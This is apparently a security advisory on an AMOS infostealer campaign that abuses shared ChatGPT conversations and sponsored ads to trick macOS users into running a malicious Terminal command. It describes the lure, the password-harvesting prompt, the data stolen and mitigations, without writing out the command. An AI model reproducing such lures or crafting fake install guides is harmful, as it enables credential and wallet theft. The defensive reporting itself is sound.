The AMOS infostealer campaign represents a novel social engineering attack leveraging the official ChatGPT chat-sharing feature to distribute malicious installation instructions for a fake macOS browser named Atlas. Attackers purchase sponsored Google ads targeting keywords like “chatgpt atlas” that lead victims to URLs hosted on chatgpt.com under the /share/ path, which are publicly shared ChatGPT conversations. These conversations are carefully crafted using prompt engineering to produce a convincing step-by-step installation guide instructing users to copy and paste a single shell command into their macOS Terminal. This command downloads a malicious script from a suspicious domain (atlas-extension.com) and executes it. The script prompts the user for their system password to gain elevated privileges, repeating the prompt until correct credentials are entered. Once authenticated, the script installs the AMOS infostealer malware and a backdoor that persists across reboots. AMOS is capable of stealing a wide array of sensitive data including browser passwords and cookies from Chrome and Firefox, cryptocurrency wallet data from Electrum, Coinomi, and Exodus, files with extensions TXT, PDF, DOCX from common user folders, and data from Telegram Desktop and OpenVPN Connect. The backdoor provides attackers with remote control capabilities, effectively extending the malware’s reach. This attack is a variation of the ClickFix technique, which relies on convincing users to manually execute commands rather than exploiting software vulnerabilities. The use of the official ChatGPT domain for hosting malicious content increases the attack’s credibility and likelihood of success. The campaign targets macOS users, exploiting their curiosity about new AI tools and browsers. No known exploits or patches exist since the attack depends on user interaction and social engineering rather than software flaws. The threat highlights the evolving tactics of attackers using AI platforms and legitimate services to bypass traditional security controls.

For European organizations, the AMOS infostealer poses significant risks to confidentiality and integrity of sensitive data. The malware’s ability to steal passwords, cookies, crypto wallets, documents, and messaging app data can lead to credential theft, financial loss, intellectual property exposure, and operational disruption. The installed backdoor enables persistent remote access, increasing the risk of lateral movement, espionage, or ransomware deployment. Organizations with macOS endpoints, especially those with employees experimenting with AI tools or downloading new software, are vulnerable. The attack’s use of official domains to host malicious content may reduce user suspicion and increase infection rates. Data breaches resulting from AMOS infections could lead to regulatory penalties under GDPR, reputational damage, and financial costs. The campaign also underscores the challenge of defending against social engineering attacks that exploit emerging technologies and user trust. Without proper awareness and endpoint protection, European businesses risk significant data compromise and operational impact.

1. Conduct targeted user awareness training emphasizing the dangers of running unsolicited shell commands, especially those received via web pages, chats, or emails, even if hosted on trusted domains. 2. Implement strict macOS endpoint protection solutions capable of detecting and blocking known infostealers like AMOS and suspicious script execution. 3. Enforce least privilege policies and restrict the ability of users to execute commands requiring elevated privileges without IT approval. 4. Monitor network traffic for connections to suspicious domains such as atlas-extension.com and block or alert on such communications. 5. Encourage users to verify any installation instructions or commands through trusted IT channels or by querying AI tools themselves to analyze suspicious code before execution. 6. Employ URL filtering and ad-blocking to reduce exposure to malicious sponsored ads in search engines. 7. Regularly audit macOS systems for persistence mechanisms and unusual backdoor activity. 8. Promote a security culture where employees feel comfortable reporting suspicious instructions or unexpected requests for credentials. 9. Collaborate with threat intelligence providers to stay updated on emerging social engineering techniques leveraging AI platforms. 10. Consider deploying endpoint detection and response (EDR) tools with behavioral analytics to detect anomalous command execution and data exfiltration attempts.